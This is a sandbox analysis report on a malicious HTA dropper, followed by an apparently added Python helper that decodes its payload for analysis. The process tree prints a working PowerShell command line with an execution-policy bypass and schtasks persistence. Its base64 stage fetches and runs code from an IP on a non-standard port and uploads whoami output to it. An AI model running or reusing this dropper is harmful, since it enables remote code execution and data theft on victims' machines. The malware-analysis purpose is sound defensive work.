Windows
Analysis Report
MSkUffzfPy.hta
Overview
General Information
Sample name: | MSkUffzfPy.hta (renamed because the original name is a hash value) |
Original sample name: | 38b49818bb95108187fb4376e9537084062207f91310cdafcb9e4b7aa0d078f9.hta |
Analysis ID: | 1522690 |
MD5: | 766497a165435b2d1f8722875fb76cc1 |
SHA1: | 490358273659279acdd14d7a0ba84a6b50006fd5 |
SHA256: | 38b49818bb95108187fb4376e9537084062207f91310cdafcb9e4b7aa0d078f9 |
Tags: | hta, UAC-0099, user-JAMESWT_MHT |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7696 cmdline: mshta.exe "C:\Users\user\Desktop\MSkUffzfPy.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
  - powershell.exe (PID: 7760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c kill -name mshta;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgc3RhcnQtc2xlZXAgMzk7c3RhcnQtc2xlZXAgKGdldC1yYW5kb20gLW1pbiA1IC1tYXggNDMpO3N0YXJ0LXNsZWVwIDExOyRpaWs9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRmbG09JGlpay5kb3dubG9hZGRhdGEoJ2h0dHA6Ly8yLjU5LjIyMi45ODo0MzgyMC9TWnFHbnBSTEZRSXljZEtiL3BhZ2UxMTQvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskaGJuPUlFWCAkamtyOyRiamRvKz0kaGJufE91dC1zdHJpbmc7W2J5dGVbXV0kZHJweT1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjpVdGY4LkdldEJ5dGVzKCRiamRvKTt9O3N0YXJ0LXNsZWVwIDEwOyR1ams9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50O3N0YXJ0LXNsZWVwIDE2OyR1amsudXBsb2FkZGF0YSgnaHR0cDovLzIuNTkuMjIyLjk4OjI4NDAyL3BhZ2UxMTQnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg=='; $b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content $home\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs -value $c;schtasks.exe /create /TN SearchUpdateTaskMachineCore /SC minute /mo 4 /tr $home\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs /f;;;;$temp='UEsDBBQACAAIAJEzfFcAAAAAAAAAAAAAAAALAAAAX3JlbHMvLnJlbHONjzsOwjAQRK9ibU82UCCE4qRBSGmjcADL3jhR4o9s87s9LigIoqAc7czbmap5mIXdKMTJWQ7bogRGVjo1Wc3h0p83B2jqqqNFpOyI4+QjyxEbOYwp+SNilCMZEQvnyebL4IIRKcug0Qs5C024K8s9hk8GrJmsF0FT4nB3QaFy8mrIpiLjgLWKg59116rcrX96+uezG4ZJ0ukN+lHgywEM6wpXM+sXUEsHCE+L3TymAAAAHAEAAFBLAwQUAAgACACRM3xXAAAAAAAAAAAAAAAAHAAAAHdvcmQvX3JlbHMvZG9jdW1lbnQueG1sLnJlbHOtkMsKwjAQRX8lzN6mdSEiTbsRodtSPyAm0wc2D5JU7N8bFMSKgguXw8y95zB5eVUjuaDzg9EMsiQFgloYOeiOwbE5rLZQFnmNIw/xwveD9SRGtGfQh2B3lHrRo+I+MRZ13LTGKR7i6DpquTjzDuk6TTfUvXbAspM03HUYGOhJndBFeBKrgFSSgTSirmT0amaLv1BN2w4C90ZMCnX4AKdPChD6RcSHeUT/bpH90+KBuCvQxYOLG1BLBwjc8wDAtgAAAJYBAABQSwMEFAAIAAgAkTN8VwAAAAAAAAAAAAAAABEAAAB3b3JkL2RvY3VtZW50Lnhtbe1dbW8bxxH+Kwt+SQvQPL5IFE1EDtwCaQskRZAX5KNBkSeJBckj7s5mlE+WGdsJYESGYyiA++IYLdp+pFQzok2JAfoLdv9Cf0lnZu+OlHSySYqyltRQNu9ub3fvOPPs7Ozs7Oz7H3xVr4k7tutVncZqIpNKJ4TdKDuVamNjNfHF5x9eKySE55calVLNadiriS3bS3xw4/1WseKUb9ftheggoZXbK0mNn2/WbQsr7xp10tdymnaDbi37rj1kg+X7obVctxK03XKtudB/fWalU2n81a9VG0ksMo1p7KFxyZ9f
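The `$a` blob in the powershell.exe command line above is the content written to Layouts.vbs and scheduled every 4 minutes. It decodes to a three-line VBScript that uses WScript.Shell to launch a second hidden PowerShell command, which sleeps, downloads http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt, runs it with IEX and uploads either the result or `whoami` output to http://2.59.222.98:28402/page114; those are the two non-standard ports on one IP that the signatures flag. The `$temp` blob begins with a ZIP local file header whose first entry is `_rels/.rels`, followed by `word/...` paths, but the report cuts it off. The Python below is an added analyst helper, not code from the report or from the sample: it embeds the `$a` blob and the first 56 characters of `$temp` copied from the command line, decodes the stage the same way the dropper does, lists the C2 endpoints, computes the sleep window before the first beacon, and parses what is visible of the ZIP header.

```python
"""Analyst helper for the powershell.exe command line in the process tree
above. Added example, not code from the report or from the sample.

STAGE1_B64 is the complete `$a` blob copied from that command line;
TEMP_B64_PREFIX is the first 56 characters of the `$temp` blob, which the
report truncates, so only its ZIP local file header is parsed here."""
import base64
import re
import struct
from urllib.parse import urlsplit

STAGE1_B64 = (
    "ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIi"
    "kNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3"
    "MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgc3RhcnQtc2xlZXAgMzk7c3Rhcn"
    "Qtc2xlZXAgKGdldC1yYW5kb20gLW1pbiA1IC1tYXggNDMpO3N0YXJ0LXNsZW"
    "VwIDExOyRpaWs9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRmbG09JGlpay"
    "5kb3dubG9hZGRhdGEoJ2h0dHA6Ly8yLjU5LjIyMi45ODo0MzgyMC9TWnFHbn"
    "BSTEZRSXljZEtiL3BhZ2UxMTQvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbm"
    "d0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4Lm"
    "dldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKX"
    "tbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JG"
    "JqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZG"
    "RyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskaG"
    "JuPUlFWCAkamtyOyRiamRvKz0kaGJufE91dC1zdHJpbmc7W2J5dGVbXV0kZH"
    "JweT1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjpVdGY4LkdldEJ5dGVzKCRiam"
    "RvKTt9O3N0YXJ0LXNsZWVwIDEwOyR1ams9bmV3LW9iamVjdCBuZXQud2ViY2"
    "xpZW50O3N0YXJ0LXNsZWVwIDE2OyR1amsudXBsb2FkZGF0YSgnaHR0cDovLz"
    "IuNTkuMjIyLjk4OjI4NDAyL3BhZ2UxMTQnLCRkcnB5KTt9Ig0Kci5SdW4gYy"
    "wgMCwgZmFsc2UNCg=="
)

# First 56 characters of the truncated `$temp` blob from the same command line.
TEMP_B64_PREFIX = "UEsDBBQACAAIAJEzfFcAAAAAAAAAAAAAAAALAAAAX3JlbHMvLnJlbHONjzsO"


def decode_stage(blob: str) -> str:
    """Same transform the dropper applies: FromBase64String + UTF8.GetString."""
    return base64.b64decode(blob).decode("utf-8")


def extract_urls(script: str) -> list:
    """All http(s) URL literals in the decoded script, in order of appearance."""
    return re.findall(r"https?://[^\s'\"()]+", script)


def extract_endpoints(script: str) -> list:
    """Distinct (host, port) pairs in first-seen order; default ports filled in."""
    seen = []
    for url in extract_urls(script):
        u = urlsplit(url)
        ep = (u.hostname, u.port or (443 if u.scheme == "https" else 80))
        if ep not in seen:
            seen.append(ep)
    return seen


def first_beacon_delay(script: str) -> tuple:
    """(min, max) seconds slept before the first downloaddata call.

    Sums the fixed `start-sleep N` values plus the `get-random -min A -max B`
    range; Get-Random's -Maximum is exclusive, so the upper bound uses B-1."""
    head = script[: script.lower().index("downloaddata")]
    fixed = sum(int(n) for n in re.findall(r"start-sleep\s+(\d+)", head, re.I))
    lo = hi = fixed
    for a, b in re.findall(r"get-random\s+-min\s+(\d+)\s+-max\s+(\d+)", head, re.I):
        lo += int(a)
        hi += int(b) - 1
    return lo, hi


def parse_zip_local_header(b64_prefix: str):
    """Decode the usable part of a truncated base64 blob; if it begins with a
    ZIP local file header (PK\\x03\\x04) return (compression method, first
    entry name), else None. Characters short of a full 4-char base64 group
    are dropped so a cut-off blob still decodes."""
    usable = b64_prefix[: len(b64_prefix) - len(b64_prefix) % 4]
    data = base64.b64decode(usable)
    if len(data) < 30 or data[:4] != b"PK\x03\x04":
        return None
    method = struct.unpack_from("<H", data, 8)[0]      # 8 = deflate
    name_len = struct.unpack_from("<H", data, 26)[0]   # file name length
    name = data[30:30 + name_len].decode("ascii", "replace")
    return method, name


if __name__ == "__main__":
    vbs = decode_stage(STAGE1_B64)
    print(vbs)
    for host, port in extract_endpoints(vbs):
        print("C2 endpoint: %s:%d" % (host, port))
    print("delay before first beacon: %d-%d s" % first_beacon_delay(vbs))
    print("$temp header:", parse_zip_local_header(TEMP_B64_PREFIX))
```

Run it as a script to print the decoded VBScript and the indicators. The `first_beacon_delay` figure (55 to 92 seconds on this sample) is the window a sandbox has to wait before the first GET appears, which is why short-timeout runs miss the traffic; the ZIP parser only trusts the 30-byte fixed header and the file name length it declares, so it is safe to point at any truncated blob.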